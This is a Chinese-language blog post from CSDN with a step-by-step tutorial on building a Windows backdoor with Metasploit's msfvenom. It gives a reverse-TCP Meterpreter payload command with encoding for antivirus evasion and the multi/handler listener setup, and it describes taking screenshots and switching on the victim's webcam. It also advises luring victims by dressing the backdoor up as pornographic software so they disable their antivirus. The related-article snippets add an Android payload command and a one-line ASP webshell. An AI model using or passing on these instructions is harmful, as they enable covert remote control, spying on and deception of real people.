Msfvenom建立后门程序指令及开启监听

最新推荐文章于 2024-05-11 00:24:59 发布
最新推荐文章于 2024-05-11 00:24:59 发布
阅读量7.4k 收藏 30
点赞数 8
分类专栏: Kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dreamsi_zhang/article/details/119673598
版权

一、使用场景介绍

在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。

二、利用方式

1、利用Metasploit渗透测试框架中Msfvenom组件创建后门程序,将后门程序伪装成其他的正常小程序,比如起个具有高吸引力和高诱惑力的名字。
2、将该后门程序发布在相关的网站平台或者直接通过某种合理的方式发送至受害者的电脑中。
3、在kali本地端开启监听功能。
4、诱导用户点击并出发该后门程序,kali端即显示受害者上线,可获取受害者电脑权限,可执行恶意操作。

三、利用Msfvenom创建后门程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.85.176 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

  • 参数说明
    -a: 指定架构如x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。所以我们生成32位的后门,这样在32位和64位系统中都可以使用。
    –platform: 指定平台,这里选择windows,通过–l platforms可以查看所有支持的平台。
    -p: 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads查看所有攻击载荷。
    **LHOST:**目标主机执行程序后连接我们Kali的地址LPORT目标主机执行程序后连接我们Kali的端口
    -b: 去掉坏字符,坏字符会影响payload 正常执行。
    请添加图片描述
    后门程序生成
    在这里插入图片描述

四、开启监听模块

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

  • 1、初始化数据库
    在这里插入图片描述
  • 2、通过msfconsole进入Metasploit
    在这里插入图片描述
  • 3、使用exploit模块并设置攻击载荷
    在这里插入图片描述
  • 4、set lhost 192.168.85.176
    在这里插入图片描述
  • 5、exploit
    在这里插入图片描述

五、受害者下载并触发

  • 1、这里实验环境中通过kali的apache服务提供下载窗口。
    在这里插入图片描述
  • 2、双击运行test1.exe后门程序
    在这里插入图片描述

六、exploit成功,已获取对方权限

  • 1、已监听到对方上线,已获取对方权限。
    在这里插入图片描述* 2、获取帮助信息
    在这里插入图片描述
    这里通过metasploit工具中自带的指令集来执行操作,包括核心指令、文件操作指令等。。。
  • 3、获取屏幕截图
    在这里插入图片描述
  • 4、调用对方摄像头
    在这里插入图片描述

----------------------------------------武汉艾迪飞教育-----------------------------------------------------

Dreamsi_zh
关注
  • 8
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
Msfvenom使用指南
m0_57221101的博客
02-08 6067
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom常见的使用命令
路baby的博客
06-24 2636
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenommsfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
2024年小白必学:msf基本使用_msf监听(2),2024年最新15个经典面试问题及回答思路
最新发布
2301_77121488的博客
05-11 643
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
msfvenom 基本使用
blackguest07的博客
03-05 1449
msfvenom 基础命令
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3632
msfvenom的使用
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1534
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 2982
msfvenommsf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenommsfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
使用msfvenom远程控制
m0_68638628的博客
06-29 956
msfvenommsfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控端winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控端payload.exe生成到/var/payload.exe。
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5083
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
最小asp后门程序
01-02
首先在asp文件中写如<%execute request(“value”)%>代码如果想要隐藏,就要加入一些if判断语句,即可然后在本地写个表单 代码如下:<... <textarea name=value cols=120 rows=10 width=45>...
在线扫描探测检查asp站点木马后门程序
10-31
在线扫描探测检查asp站点木马后门程序
网络攻防作业——Msfvenom的使用
yyy7654321的博客
06-28 2531
2. 利用建立监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
使用msf监听模块接收反弹shell
-
05-23 1994
msf
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4486
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 1190
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenommsfpayload(攻击载荷)和msfencode(编码加密)的组合。
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 365
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门
小白必学:msf基本使用
fly_enum的博客
10-31 678
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
msfvenom生成安卓后门
09-10
msfvenom是Metasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom命令创建后门。该命令的基本语法如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地主机IP地址> LPORT=<本地主机端口> -o <输出文件路径> 这里的LHOST标识我们的本地主机IP地址,LPORT标识本地主机的端口号,-o表示输出文件路径。我们可以根据自己的需要进行调整。 生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步优化生成的后门,例如: - 使用其他有效载荷,如android/meterpreter/reverse_http或android/meterpreter/reverse_https,以使用HTTP或HTTPS通信。 - 添加可执行权限,以确保安卓设备可以正确执行后门应用程序。 - 使用混淆技术来隐藏后门应用程序的真实目的,增加其对抗检测工具的能力。 总之,通过使用msfvenom工具,我们能够生成定制的安卓后门,用于安全测试和研究目的。然而,请注意在任何环境中合法和道德使用此类工具,并始终遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值